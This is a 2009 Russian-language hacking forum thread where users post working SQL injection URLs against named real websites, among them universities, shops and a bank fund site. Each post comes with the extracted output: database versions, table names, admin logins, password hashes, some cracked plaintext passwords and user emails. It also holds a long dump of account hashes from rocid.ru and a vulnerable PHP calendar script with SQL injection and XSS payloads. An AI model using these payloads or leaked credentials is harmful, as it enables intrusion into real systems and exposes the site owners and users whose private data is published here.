http://www.webypoku.ru/view.php?sec=1&id=-14+union+select+1,2,3,4,group_concat(table_name),6 ,7,8+from+information_schema.tables--
tables:
CHARACTER_SETS,CLIENT_STATISTICS,COLLATIONS,COLLAT ION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRI VILEGES,INNODB_BUFFER_POOL_CONTENT,INDEX_STATISTIC S,KEY_COLUMN_USAGE,PROCESSLIST,PROFILING,ROUTINES, SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE _CONSTRAINTS,TABLE_PRIVILEGES,TABLE_STATISTICS,TRI GGERS,USER_PRIVILEGES,USER_STATISTICS,VIEWS,INNODB _IO_PATTERN,article,comment,file,lesson,php4func
DezMond™
02.05.2009, 11:44
http://www.saratogasoftwaresolutions.com/jobs/details.php?ID=-35+union+select+1,fullname,3,4,5,6,7,8,9,pwd,11,12 ,13,14+from+admin/*
Leanne Madsen
409f66041978caf7e6c02d17042f251d
http://www.expertalent.com/jobs/details.php?ID=-99+union+select+1,fullname,pwd,4,5,6,7,8,9,10,11,1 2,13+from+admin/*
Sam Harrison
601e399c8dfc646df0e1d39ff1e51645
ПР5
http://www.housingnet.co.uk/jobs-details.php?jobid=297+union+select+version()--
4.0.27-standard
BlackPanther
02.05.2009, 12:40
Site:
http://www.canadiansoftwood.com/
SQL -
Уязвимый параметр:
http://www.canadiansoftwood.com/index.php?mode=news&id=1
http://www.canadiansoftwood.com/index.php?mode=news&id=-1+union+select+1,CONCAT_WS(CHAR(32,58,32),user(),d atabase(),%20version()),3,4,5,6--
csidb1@localhost : mysql : 4.1.14
Таблица:
http://www.canadiansoftwood.com/index.php?mode=news&id=-1+union+select+1,CONCAT_WS(CHAR(32,58,32),user(),d atabase(),%20version()),3,4,5,6+from+user--
mailbrush
02.05.2009, 12:59
http://news.rapmusic.tu2.ru/new.php?st=-1+union+select+1,concat_ws(0x3a,user(),database(), version())rapmusic3@localhost:rapmusic3:5.0.51a-log
http://avtolampy.com.ua/view.php?id=-288+union+select+concat_ws(0x3a,version(),database (),user())--
version: 5.0.45-log
database: avtolampy1_db
user: avtolampy1_db@s8
tables:
CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_ APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN _USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEG ES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVI LEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,catalog,conte nt,jos_adsmanager_ads,jos_adsmanager_categories,jo s_adsmanager_columns,jos_adsmanager_config,jos_ads manager_field_values,jos_adsmanager_fields,jos_ads manager_positions,jos_adsmanager_profile,jos_banne r,jos_bannerclient,jos_bannerfinish,jos_categories ,jos_components,jos_contact_details,jos_content,jo s_content_frontpage,jos_content_rating,jos_core_ac l_aro,jos_core_acl_aro_groups,jos_core_acl_aro_sec tions,jos_core_acl_groups_aro_map,jos_core_log_ite ms,jos_core_log_searches,jos_groups,jos_mambots,jo s_menu,jos_messages,jos_messages_cfg,jos_modules,j os_modules_menu,jos_newsfeeds,jos_poll_data,jos_po ll_date,jos_poll_menu,jos_polls,jos_sections,jos_s ession,jos_stats_agents,jos_template_positions,jos _templates_menu,jos_users,jos_usertypes,jos_weblin ks
http://avtolampy.com.ua/view.php?id=-288+union+select+concat_ws(0x3a,id,name,username,e mail,password)+from+jos_users--
62:Administrator:admin:support@jr.net.ua:2cdcbe2c0 a133787ceeb5516360c1cde
admin:xlsqbq
BlackPanther
02.05.2009, 15:31
Site:
http://www.belvneshstrakh.by/
SQL -
Уязвимая перемен
http://www.belvneshstrakh.by/ru//?page=news&id=1+union+select+1,2,CONCAT_WS(CHAR(32,58,32),use r(),database(),%20version()),4,5,6,7--
bvs@localhost : belvneshstrakh_by : 5.0.45-log
http://www.belvneshstrakh.by/ru//?page=news&id=-1+union+select+1,2,CONCAT_WS(CHAR(32,58,32),user() ,database(),%20version()),4,group_concat(table_nam e),6,7+from+information_schema.tables--
Table:
:::CHARACTER_SETS,:::COLLATIONS,:::COLLATION_CHARA CTER_SET_APPLICABILITY,:::COLUMNS,:::COLUMN_PRIVIL EGES,:::KEY_COLUMN_USAGE,:::PROFILING,:::ROUTINES, :::SCHEMATA,:::SCHEMA_PRIVILEGES,:::STATISTICS,::: TABLES,:::TABLE_CONSTRAINTS,:::TABLE_PRIVILEGES,:: :TRIGGERS,:::USER_PRIVILEGES,:::VIEWS,:::image,::: news,:::page,:::sections
mssql-inj
version
http://www.harrisinteractive.com/harris_poll/index.asp?PID=792+or+1=@@version--
db_name
http://www.harrisinteractive.com/harris_poll/index.asp?PID=792+or+1=(select+db_name())--
system_user
http://www.harrisinteractive.com/harris_poll/index.asp?PID=792+or+1=(select+system_user)--
tables
http://www.harrisinteractive.com/harris_poll/index.asp?PID=792+or+1=(select+top+1+table_name+fr om+information_schema.tables+where+table_name+not+ in+('Poll','AdminVerify','dtproperties','sysconstr aints','syssegments'))--
columns of table AdminVerify
http://www.harrisinteractive.com/harris_poll/index.asp?PID=792+or+1=(select+top+1+column_name+f rom++information_schema.columns+where+table_name=' AdminVerify'+and+column_name+not+in+('AdminName',' AdminPassword'))--
Data acquisition
http://www.harrisinteractive.com/harris_poll/index.asp?PID=792+or+1=(select+top+1+cast(AdminNam e+as+nvarchar)%2B%27%3A%27%2Bcast(AdminPassword+as +nvarchar)+from+AdminVerify)--
DezMond™
02.05.2009, 17:58
ПР5
http://cala.arizona.edu/events/eventdetails.php?id=-66+union+select+1,2,3,table_name,5,6,7,8,9,10+from +information_schema.tables+limit+25,100/*
таблицы:
password
users
пассы:
structure
foundation
skemoody@email.arizona.edu
utrecht
aquafina
raspberry
satellite
erihtoney
02.05.2009, 18:30
MSSQL
http://www.communication.go.ke/news.asp?id=93+union+select+1,2,3
,4,5,6,7,8+from+users
http://www.cherkov.org.ua/dis.php?nid=-5+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4#
5.0.41-community:f4ltdcom_cherkov:f4ltdcom_vadim@localhos t
tables:
CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_ APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN _USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEG ES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVI LEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,test_anti,tes t_boxing,test_duel,test_enews,test_fightart,test_g answer,test_guest,test_guns,test_health,t
_______________________
http://kolesaonline.ru/diski_view.php?code=-20210054+union+select+1,2,3,4,5,6,7,8,9,10,concat_ ws(0x3a,version(),database(),user()),12--
4.1.22-log:kolesa:kolesa-sql@localhost
_______________________
http://www.crmru.info/library_article_view.php?article_id=7+union+select +1,2,3,4,5,6,concat_ws(0x3a,version(),database(),u ser()),8,9,10,11--
4.0.27-log:micro:micro@195.242.3.251
www.cosmicscoffee.com
http://www.cosmicscoffee.com/shops.php?cid=-611+union+select+1,2,3,concat_ws(0x3a,version(),us er(),database())
Версия - 5.0.45:
Юзер - cosmicscof@localhost:
БД - cosmicscoffee
Табличка administrators
http://www.cosmicscoffee.com/shops.php?cid=-611+union+select+1,2,3,concat_ws(0x3b,user_name,us er_password)+from+administrators
kitchen;ac3a02e36381e883d05901ab270d6e80:63
.:[melkiy]:.
03.05.2009, 01:16
http://fabernet.com.ua/news?id=-2+union+select+1,2,3,4,5--
Database Version: 4.1.22-standard-log
Database name: fabernet_fabernet
User name: fabernet_faber@localhost
Админка:
http://fabernet.com.ua/admin
http://silouette.com.ua/news?id=-2+union+select+1,2,3,4,5--
Database Version: 5.0.67
Database name: silouette
User name: silouette@localhost
price_comments
Админка:
http://silouette.com.ua/admin
http://plastivka.com.ua/news?id=-2+union+select+1,2,3,4,5--
Database Version: 5.0.67
Database name: lastivka
User name: lastivka@localhost
Админка:
http://plastivka.com.ua/admin
http://expertise.in.ua/news?id=-2+union+select+1,2,3,4,5--
Database Version: 5.0.67
Database name: expertise
User name: expertise@localhost
Админка:
http://expertise.in.ua/admin
ILYAtirtir
03.05.2009, 05:03
Raiffeisen ASSET MANAGEMENT (Bulgaria)
http://ram.bg/bg/fund1'+and+substring(version(),1,1)=5--+
5ая ветка
user() = root@localhost
Головной центр предлицензионной подготовки
http://gcpp.ru/?id=1139+union+select+1,concat_ws(0x3a,database(), user(),version()),3,4,5,6,7,8,9,10,11/*
gcpp_cert:gcpp_gcpp@localhost:4.1.22-standard
http://gcpp.ru/?id=1139+union+select+1,concat_ws(0x3a,name,passwo rd),3,4,5,6,7,8,9,10,11+from+user/*
adm:tbontbtitq
oper:yrepa00
user:yyy123
Target: www.omwy.cc
Evil link: http://www.omwy.cc/en/news.php?id=-3+union+select+1,2,3,4,concat_ws(0x3a,version(),us er(),database()),6
Info:
Version: 4.1.12
User: oumeiceramic_f@localhost
Database: oumeiceramic
BlackPanther
03.05.2009, 09:19
SQL -
http://www.nadona.org/calendar.php?id=-22+union+select+1,CONCAT_WS(CHAR(32,58,32),user(), database(),%20version()),3,4,5,6,7,8--
nadona_sql@localhost : nadona_admin : 5.0.27-standard
Поскольку версия больше 5 узнаем таблицы....
http://www.nadona.org/calendar.php?id=-22+union+select+1,CONCAT_WS(CHAR(32,58,32),user(), database(),%20version()),GROUP_CONCAT(0x3a,0x3a,ta ble_name),4,5,6,7,8+from+information_schema.tables--
..::TROYAN::..
03.05.2009, 11:49
Какойто китайский шоп...
taiwanrice.com
http://taiwanrice.com/upload/user.php?act=order_query&order_sn=%27%20union%20select%201,2,3,4,5,6,concat _ws(0x3a,user(),database(),version()),8/*
tinwhang@localhost:ecshop:5.0.45
http://taiwanrice.com/upload/user.php?act=order_query&order_sn=%27%20union%20select%201,2,3,4,5,6,table_ name,8%20from%20information_schema.tables+limit+1, 1/*
44 таблицы
http://taiwanrice.com/upload/user.php?act=order_query&order_sn=%27%20union%20select%201,2,3,4,5,6,concat _ws(0x3a,user_name,password),8%20from%20ecs_users/*
юзвери:
email,login,hash,password
888@go56.net,6hth,924c38132b75ff3dccb94114f5326e8
lny2307@yahoo.com.tw,lny2307,ef3592f32a1c28b572c20 14ffb0910b0:655411
wanhsin.li@msa.hinet.net,wendy, 0e0a6a1e3566821e6117746aa2a2ff72
katty-cheng@umail.hinet.net, 陳妍如, 576966f758ceee75f38271489ef7e839:841009
jean5202000@yahoo.com.tw,jean5202000, 26be9bb4e49df2e9742056e54db12789
ecs_admin_user
'tinwhang', '888@go56.net', 'f50ea380584f8fa388cf45bc5366f3fa:inmine00'
PR:0
тиц:0
http://www.dreambabys.nl/reborn-baby.php?id=-35+union+select+1,2,3,0x7265616c20706f63616e69,5,6 ,7,8,9,10,11,12,13--
5.0.51a-community
_SEREGA_
03.05.2009, 13:15
скуль:
http://www.amerimar.com/team.php?id=-10+union+select+1,2,3,4,5,6--
версия:
http://www.amerimar.com/team.php?id=-10+union+select+1,version(),3,4,5,6--
5.0.67
инфа:
http://www.amerimar.com/team.php?id=-10+union+select+1,concat_ws(0x3a,user()),3,4,5,6--
amerimar@72.167.183.41
таблицы выводятся лимитом.
http://www.amerimar.com/team.php?id=-10+union+select+1,table_name,3,4,5,6+from+informat ion_schema.tables--
DezMond™
03.05.2009, 13:57
http://www.nano.gatech.edu/news/release.php?id=-2540+union+select+1,2,3,4,table_name,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2 8,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44, 45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61 ,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,7 8,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94, 95,96+from+information_schema.tables+limit+282,100 0--
Tables:
user_roles
user_profiles
user_logins
b.gonzalez:a9fbdd1e49f69d2e46c3f9baf93d092b:0
j.swaby:edff5064c3f51437182395bf4f77f0b3:js333
_SEREGA_
03.05.2009, 14:08
скуль:
http://www.zimsculpt.com/artist.php?id=-10+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20--
версия:
http://www.zimsculpt.com/artist.php?id=-10+union+select+1,version(),3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20--
4.1.20 =(
info:
http://www.zimsculpt.com/artist.php?id=-10+union+select+1,concat_ws(0x3a,user(),database() ),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
user() z887hhH1q@localhost
database() zimsculpt
erihtoney
03.05.2009, 14:38
PR:4
MSU Physics and Astronomy Department
http://support.pa.msu.edu/howto.php?id=9999%20UNION%20SELECT%201,2,3,concat_ ws(0x3a,version(),user(),database()),
5,6,7,8,0,0,0,0,0,0/*
version:4.1.22
user:smgr@kronos-pa.pa.msu.edu
database:supportsite
http://support.pa.msu.edu/howto.php?id=9999%20UNION%20SELECT%201,2,3,version (),char(60,97,32,104,114,101,102,61,39,104,116,116 ,112,58,47,47,106,108,111,100,103,101,46,99,111,10 9,47,117,110,105,111,110,47,109,97,112,46,104,116, 109,108,39,62,117,110,105,111,110,60,47,97,62),6,7 ,8,0,0,0,0,0,0/*
<<Ролевая игра "На той Гражданской">>
http://cwar.holdgold.ru/page.php?id=143+union+select+1,2,concat_ws(0x3a,ve rsion(),database(),user(),@version_compile_os),4,5--+
5.0.67-log:u9753_holdgold:u9753@10.10.153.162
_SEREGA_
03.05.2009, 16:59
скуль:
http://www.propville.com/viewPress.php?id=-10+union+select+1,2,3,4--
версия:
http://www.propville.com/viewPress.php?id=-10+union+select+1,2,version(),4--
4.1.20 блин <5 =)
info:
http://www.propville.com/viewPress.php?id=-10+union+select+1,2,concat_ws(0x3a,user(),database ()),4--
user() propville@216.119.125.2
database() propville
http://www.sorbents.ru/products/product.php?id=-985+union+select+concat_ws(0x3a,version(),database (),user()),2,3--
5.0.45-log:usorbents14:usorbents14@localhost
http://www.sorbents.ru/products/product.php?id=-985+union+select+group_concat(table_name),2,3+from +information_schema.tables
http://aap.usluga21.ru/product.php?id=-19+union+select+1,2,unhex(hex(concat_ws(0x3a,versi on(),database(),user()))),4,5,6,7,8,9,10,11,12,13, 14,15--
4.1.18-standard:db_usluga215:usluga215@localhost.localdom ain
// антибоян не работает
HAXTA4OK
03.05.2009, 20:48
http://www.metalsrepublic.ie/temp.php?id=1&image=-6+union+select+1,concat_ws(0x3a,version(),database (), user()),3,4--
5.0.51a-log:370900_metals:370900_metals@172.17.2.130
PR: 4
_SEREGA_
03.05.2009, 21:21
скуль:
http://www.fullframefest.org/more_film_info.php?id=-30+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19--
версия:
http://www.fullframefest.org/more_film_info.php?id=-30+union+select+1,2,version(),4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19--
5.0.67
таблицы выводятся limit'om
http://www.fullframefest.org/more_film_info.php?id=-30+union+select+1,2,table_name,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19+from+information_schema.tab les--
info:
http://www.fullframefest.org/more_film_info.php?id=-30+union+select+1,2,concat_ws(0x3a,user(),database ()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
user() fullfram_admin@localhost
database() fullfram_films
Обе скули с File_priv = Y
Знакомства)
_http://www.privat.nnover.ru/skazka.php?id=-1975'+union+select+1,concat_ws(0x3a,user,password, file_priv),3+from+mysql.user+limit+0,1--+
Версия 5
Русский рэп хуле.... :(
_http://www.rapway.com.ua/bio.php?id=-7+union+select+1,2,concat_ws(0x3a,user,password,fi le_priv),4+from+mysql.user+limit+0,1--
Version():5
Skofield
03.05.2009, 22:09
http://www.gotennis.ru
http://www.gotennis.ru/players/index.php?id=-9999+union+select+1,2,3,4,5,6,concat_ws(0x3a,versi on(),database%20(),%20user()),8,9,10,11,12,13,14,1 5,16,17,18/*
5.0.37-standard-log:gotennis:gotennis_gotenni@localhost
HAXTA4OK
03.05.2009, 22:25
http://imhc.ie/newsRoom/newsRoomItem.php?id=-1+union +select+1,concat_w s(0x3a,version(),database(),user()),3,4,5,6--
5.0.45-community-log:imhc200_mainSite:imhc200_webuser@win9.hosting3 65.ie
PR: 5
[x59]ReV
03.05.2009, 22:27
база с аккаунтами http://rocid.ru
cлита благодоря уязвимости на одном из проектов rocid.ru
_http://2008.rif.ru/system/remote/get.program.reports.php?id=-739+union+select+concat_ws(0x3a,rocid,password),2+ from+user%23
часть
3124:0c4c2281b3d37cb1ae53d636ca75fe35
2
РИФ-2008
3125:5f1196a1ec20750f694605aae950ee7e
2
РИФ-2008
3126:1fda1172d35cf7345a8417bead5fc19a
2
РИФ-2008
3127:
2
РИФ-2008
3128:ae47369a1ae1714f64c67edc923c87fa
2
РИФ-2008
3129:09f53cc7e908d01d60e53d2bd470f984
2
РИФ-2008
3130:2a11aaa37e4220dbebbf8645b46996c3
2
РИФ-2008
3131:475cf107d121df30b62ef1e8e4c35e19
2
РИФ-2008
3132:
2
РИФ-2008
3133:12e2250866eb9261bf6b6c3ef0616d43
2
РИФ-2008
3134:
2
РИФ-2008
3135:34b2e8df62881ec0f4cd547ae10d787b
2
РИФ-2008
3136:716ff43d911d8fb6bf074d1b951a2689
2
РИФ-2008
3137:
2
РИФ-2008
3138:fd88810ebaabfafa345a2dc264697b29
2
РИФ-2008
3139:
2
РИФ-2008
3140:4691480bb2c98437b6636f2e3695d976
2
РИФ-2008
3141:7decf0f7198de7eb3aaba586fba2e1c2
2
РИФ-2008
3142:67b7ccc80269d02cedd51ba304af8d09
2
РИФ-2008
3143:
2
РИФ-2008
3144:9a70e1a81f6e55a57ab451e7d999bcab
2
РИФ-2008
16373:cd50b4634dee7c29031904e8284e9cdb
2
РИФ-2008
3149:717a75de484ce35a2b8aa79d333cc9d2
2
РИФ-2008
3150:801788e40d69cdeeedcdba6605f21e2d
2
РИФ-2008
3151:922350fbbccc3bda1669733ed490ac58
2
РИФ-2008
3152:634433929375939e4b60442ec139847e
2
РИФ-2008
3153:c4d26b0dca751e00ea171d33b2c40325
2
РИФ-2008
3154:01efbcbef25f550f6e08cf5c465f3f0d
2
РИФ-2008
3155:
2
РИФ-2008
3156:
2
РИФ-2008
3157:
2
РИФ-2008
3158:7a728f0dc76d78c92de4116e76cbc04c
2
РИФ-2008
3159:
2
РИФ-2008
3161:5b54cee8c1e0e6df7556475ecec5b5b0
2
РИФ-2008
3164:1e0638ce5fd70fa8cd5bbb210c3ec3a3
2
РИФ-2008
15962:afaee984acb2676f6e7d753896d4d895
2
РИФ-2008
3167:c600b74d29b634c7ce1f2f4df8ca19f4
2
РИФ-2008
3168:91cddd6f4f4cc0b52446c9aa6397eb01
2
РИФ-2008
3169:ffb037b37caff76113f80881f4163454
2
РИФ-2008
3171:
2
РИФ-2008
3172:6cd8c0b549625c0f19be373db679c078
2
РИФ-2008
3173:
2
РИФ-2008
3174:1ac91903ec12b53949c33e322457696d
2
РИФ-2008
3175:
2
РИФ-2008
16400:af56c0019d77277251a658c9a1cbfa16
2
РИФ-2008
3178:c65486a65c2800c39620763673073339
2
РИФ-2008
3179:f3d0584c7039dde1843450a4bdf5bd4f
2
РИФ-2008
3180:1302dd9e9288382c09c914348e271dad
2
РИФ-2008
3181:0fd676b4165a0de5d583bd05732349dd
2
РИФ-2008
3182:4c1e4f015ba9b8bec237dc1ca705466d
2
РИФ-2008
3183:
2
РИФ-2008
3184:
2
РИФ-2008
3185:7bfe2a5ea387756d1c6a2bf758694bf9
2
РИФ-2008
3186:9e59f430475fa6bc79f994df0ef19522
2
РИФ-2008
3187:0d2df42c035414da2117819ce94eaf79
2
РИФ-2008
3188:
2
РИФ-2008
3190:3416e6cf3ed1f8fc41dc32c211b5c2a0
2
РИФ-2008
3191:
2
РИФ-2008
3192:8462a8056f34c5a7e9e4305199a60b05
2
РИФ-2008
3193:
2
РИФ-2008
3194:adda34cab5d7c68e5ce14550e35d43f6
2
РИФ-2008
3195:2febd2b2158fead9dea486293f86c7a0
2
РИФ-2008
3196:4f78546437f543381f6e7d86437a0567
2
РИФ-2008
3197:c1145a13a40fd7dcbd799dcc34ae353b
2
РИФ-2008
3198:97bacfa46436740e80d525b1b96828c2
2
РИФ-2008
3199:ac82abe05555d1a069e0f88b84782dc1
2
РИФ-2008
3201:e326da29dbc1985096cf9fbde220455a
2
РИФ-2008
3202:1229220bd86c083c6b20e733876bf66d
2
РИФ-2008
3203:4f76adce601de9b0c86c15f06cd03ac9
2
РИФ-2008
3204:68df453c237e187af5ce194d1f387bfb
2
РИФ-2008
3205:
2
РИФ-2008
3206:896a4a8c1ae7f6c8ad4b84c60451ee6b
2
РИФ-2008
3207:
2
РИФ-2008
3208:e7e4dd126ab44999791c111158c2316d
2
РИФ-2008
17884:4db8bfe236eb3ae765b039517ec4f2a2
2
РИФ-2008
3210:
2
РИФ-2008
3212:31b62a5d13d3afc075daef4e682711ad
2
РИФ-2008
3214:
2
РИФ-2008
3215:1ffedadae4957c16df568ce5ba1ae3df
2
РИФ-2008
3216:af017e24b54b9631628936d2ed8b682d
2
РИФ-2008
3217:
2
РИФ-2008
3218:
2
РИФ-2008
3219:
2
РИФ-2008
3220:3d7278064efd026546268220bb052cba
2
РИФ-2008
3221:7ea4f15a6736cd7c39a4c895ee0b3a07
2
РИФ-2008
3222:
2
РИФ-2008
3223:
2
РИФ-2008
3224:94cdf4e58760134e83290ec66c6024f0
2
РИФ-2008
3226:f68502235c02e55aea5d800afc01b9ca
2
РИФ-2008
3227:
2
РИФ-2008
3229:30a421658a945a378d8f7f4eae62bb93
2
РИФ-2008
3230:
2
РИФ-2008
3231:
2
РИФ-2008
18015:6321776a2c2ae171761655cf0329fee1
2
РИФ-2008
3233:
2
РИФ-2008
3234:
2
РИФ-2008
3235:
2
РИФ-2008
3236:1333cbbaed8c4707146735242bca3901
2
РИФ-2008
3237:
2
РИФ-2008
3238:bebf82be67f689f4662373746fbed1eb
2
РИФ-2008
3239:
2
РИФ-2008
3241:87df550c0b3b59f0e353279593baeebb
2
РИФ-2008
3242:75a0510d0c4cd2b10e9df1fae15e039b
2
РИФ-2008
3243:61c49fce8be161fb6d0fb196745fedab
2
РИФ-2008
17829:e745a6bad4ffe5a1b35aac134ea148c7
2
РИФ-2008
3245:
2
РИФ-2008
3246:423ca618e3aef6d320b10ec971dd97c2
2
РИФ-2008
3248:6dd871c1f30b9b870e9809d8046ace4f
2
РИФ-2008
3249:
2
РИФ-2008
3251:69f5719cf7bab7ca7490e3caa9cbb5ca
2
РИФ-2008
3252:
2
РИФ-2008
3253:3905a2aa637c455897ae8e2e74927a88
2
РИФ-2008
3254:7eebd5fca04fe123c418d0afd9437e79
3255:5ac245b339a163668f6fcdf5fff2d7d2
2
РИФ-2008
3256:6c3dac64e06b0996ce7cc9a20630f1ac
3260:32966204931ddae303a8b3826a017df9
3261:c76d8cd13766943816b40c0315467db8
3267:4f8fd4afe6534d691d2fd1971a547e30
3268:fe107478bcd2328540d3dbf5925e2587
3271:16dc701af136418f6502c16370d16fb7
3272:84de7a77c9118b47d46d33cbc8b236ef
3275:785b74364fe5b6de1dff574add7f53b6
3276:b306afc72e73da89cc0f770bbfffbea7
3277:3be60c9d035488a6c736ae6213c5e717
3278:65fdae00e07c01b7859e3bd42afc3456
3281:0e46c5fb6656147c33627ba75444e0c0
3282:f813d697e75e5f971cd3a66095441934
3283:a1818fcfb1161945b174c754b6bab725
3284:86c1a86bbb3b180f795d5674bf76f9e5
3286:adf95a0e9a8c9e65b93b60c062b4fdbc
3289:cca52de0433bf19373eb6731b03bba2f
3290:89541e79bc92bcd6d257630a2a804181
3291:7ebb0e58a319a47a3f791cbf34b4d443
3293:3e8ea9c2f373f6dfd09a50ad6bcf8cfa
3294:6d65e2cdbe4b0f7a9710a055c9531a29
3295:0a4e374d00643e9f48ed083a3fc9d232
3297:da91d50559e88a9e3c299cb56de0a25b
3298:726581b959d6a70f2c46c1f8401ca117
3299:e9296a0ccbd3374203227afd8fe5b469
3301:b3f2c5c4ec13722ffe492be1b1cf2adf
3303:fe8140fa01967942728e23ba8b2e8c0a
3305:5ce7023862e647b3c4d428c539b9b4b3
3306:5bb62948014c4be7f77fe27a1a06b63f
3307:1115b255a1387d52baa95f925ee42dd3
3308:9d625a5c030fe550041a6ab57ecdb802
16151:134929f01ee91213e508b23e6ec11623
3310:83793af93325ea2b9f662653eaebb8d8
3313:a58e13270371e5279b0b08ddfb401240
3314:395d6572bc9e7d0d0b957217d74101d9
16362:19824e040e453f7d4eaad993583366bf
3320:d9a872527e451dc724c70faca9108ee9
3321:59ece891e1b690d4a3488fd49dcc8fc0
2163:34b754be5c7bd7d3ad64776d79c49efe
3322:1880ea23e29feae165143df01f2c0beb
3323:3b1250f6796f41e83764b1972b3e8519
3324:0fee4df4d1cd8e1815fedd7ab53f49dc
3325:454d6c31030e7495e2d35f5ee216d208
3326:0a53f8afb9f782281821f7aceae238b6
3327:8b17ab270e41abf61a56ec7a978bb6ad
17997:85e5bde86b3898d2001f327c3b8bf05e
2349:fe532bc9dfd00df95e4d58183b9314d0
2210:3f80f2ef3f496013232e65d5f78f1c5c
порядка 40% паролей чиловые.
HAXTA4OK
03.05.2009, 22:37
http://www.armchair.ie/tell_friend.php?id=-1+union+select+1,2,concat_ws(0x3a,ve rsion(),data base(),u ser()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26,27,28,29,30--
5.0.51a-3ubuntu5.4-log:armchair:armchair@localhost
PR: 2
[x59]ReV
03.05.2009, 22:37
Xss&Sql-inj в скрипте календаря.
2)характерная черта линк вида /news/?_Year=2009&_Month=4&_Day=10
3)news/?_Year=2009&_Month=4'&_Day=10 sql-inj
4)news/?_Year=2009&_Month=4</script><script>alert(/xss/)</script>&_Day=10
cам уязвимый скрипт
<?
global $DOCUMENT_ROOT;
$DOCUMENT_ROOT = $_SERVER['DOCUMENT_ROOT'];
include "$DOCUMENT_ROOT/manage/inc/all.php";
if (!((isset($_Year)) && (isset($_Month)) && (isset($_Day)) && (isset($id))))
print 'Ошибка календаря';
else
{
$id = content_get_initial($id);
$iface = content_lookup_id($id);
$Months = array ("","is_January", "is_February", "is_March", "is_April", "is_May", "is_June", "is_July", "is_August", "is_September", "is_October", "is_November", "is_December");
$DoDays = array (31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31);
$LDoDays = array (31, 29, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31);
$p_m = $iface->GetPredYM($_Month,$_Year);
$p_m = explode('_',$p_m);
$n_m = $iface->GetNextYM($_Month,$_Year);
$n_m = explode('_',$n_m);
$prev_Month = mktime (0,0,0,$p_m[0], 1, $p_m[1]);
$next_Month = mktime (0,0,0,$n_m[0], 1, $n_m[1]);
//$prev_Month = mktime (0,0,0,$_Month-1, 1, $_Year);
//$next_Month = mktime (0,0,0,$_Month+1, 1, $_Year);
$MaxDay = date("t",mktime (0,0,0,$_Month, 1, $_Year));
$prev_MaxDay = date("t",$prev_Month);
$next_MaxDay = date("t",$next_Month);
$firstYM = explode('-', $iface->GetFirstYM());
$lastYM = explode('-', $iface->GetLastYM());
?>
<div id="months"><?if (!(($_Month==$firstYM[1]) && ($_Year==$firstYM[0]))) {?><a href="#" class="prev" onclick="get_request('/inc/calendar.php?_Year=<?=date("Y",$prev_Month)?>&_Month='+parseInt(<?=date("m",$prev_Month)?>,10)+'&_Day=0&id=<?=$id?><?=((isset($pub))? "&pub=".$pub: "")?>'); return false;"><img src="/pics/larr.gif" alt="<-" width="14" height="7"></a><?} else {?><a><img src="/pics/clear.gif" width="14" height="7"></a><?};?><?=$Months[$_Month]." ".$_Year?><?if (!(($_Month==$lastYM[1]) && ($_Year==$lastYM[0]))) {?><a href="#" class="next" onclick="get_request('/inc/calendar.php?_Year=<?=date("Y",$next_Month)?>&_Month='+parseInt(<?=date("m",$next_Month)?>,10)+'&_Day=0&id=<?=$id?><?=((isset($pub))? "&pub=".$pub: "")?>'); return false;"><img src="/pics/rarr.gif" alt="->" width="14" height="7"></a><?} else {?><a><img src="/pics/clear.gif" width="14" height="7"></a><?}?></div>
<table>
<tr>
<th>is_PN</th>
<th>is_VT</th>
<th>is_SR</th>
<th>is_CT</th>
<th>is_PT</th>
<th>is_SB</th>
<th>is_VS</th>
</tr>
<?
print '<tr>';
$weekdayfirst = date("w",mktime (0,0,0,$_Month, 1, $_Year));
if ($weekdayfirst=='0')
$weekdayfirst = 7;
$dayweek = $weekdayfirst-1;
$firstdate = $prev_MaxDay - $weekdayfirst+2;
for ($j=$firstdate;$j<=$prev_MaxDay;$j++)
print '<td class="empty">'.$j.'</td>';
for ($i=1;$i<=$MaxDay;$i++)
{
$dayweek=$dayweek+1;
if (($dayweek%7==1) && ($dayweek!=$weekdayfirst))
print '</tr>
<tr>';
if (($i==date("d")) && ($_Month==date("m")) && ($_Year==date("Y")))
{
if (($iface->IsThisDatePub($_Year,$_Month,$i)) && ((isset($pub)) || ($i!=$_Day)))
print '<td class="current"><a href=".?_Year='.$_Year.'&_Month='.$_Month.'&_Day='.$i.'">'.$i.'</a></td>';
else
print '<td class="current">'.$i.'</td>';
}
elseif (($iface->IsThisDatePub($_Year,$_Month,$i)) && ((isset($pub)) || ($i!=$_Day)))
print '<td><a href=".?_Year='.$_Year.'&_Month='.$_Month.'&_Day='.$i.'">'.$i.'</a></td>';
else
print '<td>'.$i.'</td>';
}
$j=0;
while ($dayweek%7>=1)
{
$dayweek=$dayweek+1;
$j=$j+1;
print '<td class="empty">'.$j.'</td>';
}
print '</tr>';
?>
</table>
<?
}
?>
izhevsk.citysvyaz.ru
